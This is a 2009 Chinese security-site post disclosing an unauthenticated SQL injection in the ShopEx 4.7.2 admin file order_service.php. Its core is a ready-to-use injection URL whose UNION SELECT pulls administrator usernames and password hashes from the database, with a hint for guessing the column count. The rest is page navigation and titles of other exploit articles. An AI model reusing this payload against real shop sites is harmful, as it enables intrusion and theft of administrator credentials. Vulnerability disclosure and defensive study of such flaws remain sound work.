首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>漏洞资料>文章内容 ShopEx 4.7.2 0day 来源：www.vfcocus.net 作者：无名 发布时间：2009-03-02   我是无名，这次写一个shopex4.7.2漏洞， 已经通知了官方，今天就发出来， 首先syssite/shopadmin/order_service.php后台这个文件没有验证用户身份， 重要的是$v_id参数没有过滤 syssite/shopadmin/order_service.php?m_id=1&key=986078fbe1474d61464d08535f1002a8&&v_id=1+and+1=2+union+select+concat(username,0x20,userpass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+sdb_mall_offer_operater%23直接获取管理员账号密码md5自己解，字段数不对用order by 猜   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·XSOK环境变量本地命令执行漏洞 ·N点虚拟主机管理系统 致命漏洞。 ·南方数据企业网站管理系统V10.0 ·动网（DVBBS）Version 8.2.0 后 ·Solaris 10 telnet漏洞及解决 ·破解无线路由器密码，常见无线密 ·Nginx %00空字节执行php漏洞 ·WinWebMail、7I24提权漏洞 ·XPCD xpcd-svga本地缓冲区溢出漏 ·Struts2多个漏洞简要分析 ·ecshop2.72 api.php 文件鸡肋注 ·Discuz!后台拿Webshell 0day   相关文章 ·远古视频点播系统的一个注入漏洞 ·discuz旗下产品 ·诺基亚 N95-8 (JPG File) Remote ·诺基亚 N95-8 browser (setAttri ·ewebeditor最新版本漏洞 ·phpcms2008-0day ask/search_aja ·魅力企业网站管理系统 2009 SP3 ·浅析LxBlog V6变量未初始化漏洞 ·Discuz!论坛wap功能模块编码的注 ·hzhost6.5虚拟主机管理系统最新S ·尘月网络企业网站智能管理系统漏 ·PHP popen()函数缓冲区溢出漏洞   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved